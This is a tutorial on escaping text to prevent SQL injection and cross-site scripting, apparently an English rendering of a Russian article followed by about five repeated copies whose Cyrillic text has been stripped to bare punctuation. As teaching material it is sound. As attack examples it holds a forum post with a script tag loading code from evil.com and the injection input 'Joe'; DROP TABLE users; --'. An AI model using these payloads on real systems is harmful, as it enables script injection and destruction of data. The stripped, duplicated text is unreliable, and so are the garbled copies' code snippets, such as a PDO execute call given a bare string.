        I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat."
    </p>
</div>

Now a user posts something with angle brackets in it:

<div class="post">
    <p class="meta">
        Posted by Pascal on November 23, 04:12
    </p>
    <p class="body">
        Basic math tells us that if x < n and y > n, x cannot be larger than y.
    </p>
</div>

...still fine. The browser is forgiving about a stray < in the body text, so nothing breaks. But what if the next post looks like this?



<div class="post">
    <p class="meta">
        Posted by JackTR on July 18, 12:56
    </p>
    <p class="body">
        <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script>
    </p>
</div>

Do you see what happened? Our page now contains a script tag that points at somebody else's JavaScript, and every browser that shows the page loads and runs that script, with the visitor's cookies and session at its disposal. The user's text was supposed to be text, but since it was pasted into HTML unmarked, the browser reads it as HTML. Exactly the SQL situation all over again.





The root cause is the same in both cases: text was put into text without escaping! A quote is "special" in SQL, an angle bracket is "special" in HTML, and we passed both through unmarked. What to do?



Escape, of course. Which characters? The ones that are special in the text we are writing into. How do we mark them as "just text"? With the escape rules of that text!

For the SQL case there is an escape function made for exactly this. In PHP with MySQL it looks like this:

$name = $_POST['name'];
$name = mysql_real_escape_string($name);
$query = "SELECT phone_number FROM users WHERE name = '$name'";
$result = mysql_query($query);

Now the "special" characters are marked. The resulting SQL for the same three inputs:

$name: Alex
Query: SELECT phone_number FROM users WHERE name = 'Alex'

$name: Mc'Donalds
Query: SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

$name: Joe'; DROP TABLE users; --
Query: SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string puts a backslash in front of each quote (and the other characters that are special to MySQL), so the database reads the quote as part of the name and not as the end of it. The query does what it should.



And the same for HTML:

<div class="post">
    <p class="meta">
        Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?>
    </p>
    <p class="body">
        <?php echo htmlspecialchars($post['body']); ?>
    </p>
</div>

htmlspecialchars replaces the characters that are special in HTML (<, >, & and ") with their entities. The dangerous post from before now comes out as:

<div class="post">
    <p class="meta">
        Posted by JackTR on July 18, 12:56
    </p>
    <p class="body">
        &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt;
    </p>
</div>

The browser shows the script tag as text, because every bracket and quote is marked as "just text". The HTML structure stays ours.
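The same template in Python, as an added example that is not from the article: html.escape plays the role of htmlspecialchars, and the two posts from the article are the sample input (constructed here for the illustration). The round-trip function shows the point made about the ampersand earlier: the escape character is escaped too, so nothing is lost.

```python
# Added example, not part of the original article: the post template with
# and without HTML escaping, using Python's html.escape in place of PHP's
# htmlspecialchars.
import html
import re

# The article's template, flattened to one line for easy comparison.
TEMPLATE = (
    '<div class="post"> <p class="meta"> Posted by {username} on {date} </p> '
    '<p class="body"> {body} </p> </div>'
)

# Constructed sample posts; the bodies are the ones the article uses.
POSTS = [
    ("Pascal", "November 23, 04:12",
     "Basic math tells us that if x < n and y > n, x cannot be larger than y."),
    ("JackTR", "July 18, 12:56",
     '<script src="http://evil.com/dangerous.js" type="text/javascript" '
     'charset="utf-8"></script>'),
]


def render_unescaped(username: str, date: str, body: str) -> str:
    """The template as first shown: user text pasted straight into the HTML."""
    return TEMPLATE.format(username=username, date=date, body=body)


def render_escaped(username: str, date: str, body: str) -> str:
    """html.escape marks &, <, >, " and ' so the browser reads them as text.
    Every value goes through it, not just the one we happen to distrust."""
    return TEMPLATE.format(
        username=html.escape(username),
        date=html.escape(date),
        body=html.escape(body),
    )


def contains_script_tag(document: str) -> bool:
    """A crude check for the symptom: does the document contain a real
    <script> tag (as opposed to the text '&lt;script')?"""
    return re.search(r"<script\b", document, re.IGNORECASE) is not None


def round_trip(text: str) -> str:
    """Escaping is lossless: & becomes &amp;, so a literal '&lt;' in the
    input survives as '&amp;lt;' and comes back unchanged when decoded."""
    return html.unescape(html.escape(text))


if __name__ == "__main__":
    for post in POSTS:
        print(render_escaped(*post))
```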



...and that is the whole rule: whenever you put text into text, escape it by the rules of the text you are writing into. Into SQL, escape for SQL. Into HTML, escape for HTML. Into a JavaScript string (or anything else), escape for that. There is no universal "escape" function that works for everything, because what counts as special depends entirely on the target.





Finally, a few things that are often confused with escaping, or offered as substitutes for it:

Validation

Validation means checking that the input is what you expect. If you expect a number, "DROP TABLE users" is not a number, but "42" is, and you can reject the former before it goes anywhere near the database. Validation is useful, but it is not escaping: valid text can still contain characters that are special in HTML/SQL, and a name with a quote in it is a perfectly valid name. Validate for correctness, escape for the target text.

Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

Prepared statements solve the SQL problem in a different way: the SQL text and the data are sent to the database separately, so the user's text never becomes part of the query and nothing needs escaping. In PHP with PDO:

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
// execute() takes an array of values; each one is bound to a placeholder, never pasted into the SQL text
$stmt->execute([$_POST['name']]);

This is the preferred way to talk to a database today. Strictly speaking it is not escaping; it makes escaping unnecessary, because the text never ends up inside the other text in the first place.





To sum up: text inside text is everywhere. Whenever you assemble a text (a query, a document, a program) out of pieces, and some of those pieces come from somewhere else, each piece must be marked according to the rules of the text it goes into. "Special" characters are only special to a particular format, and only that format's escape rules can make them harmless. Keep that in mind, and SQL injection (and XSS in HTML) stop being a mystery.
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).

? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).

? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

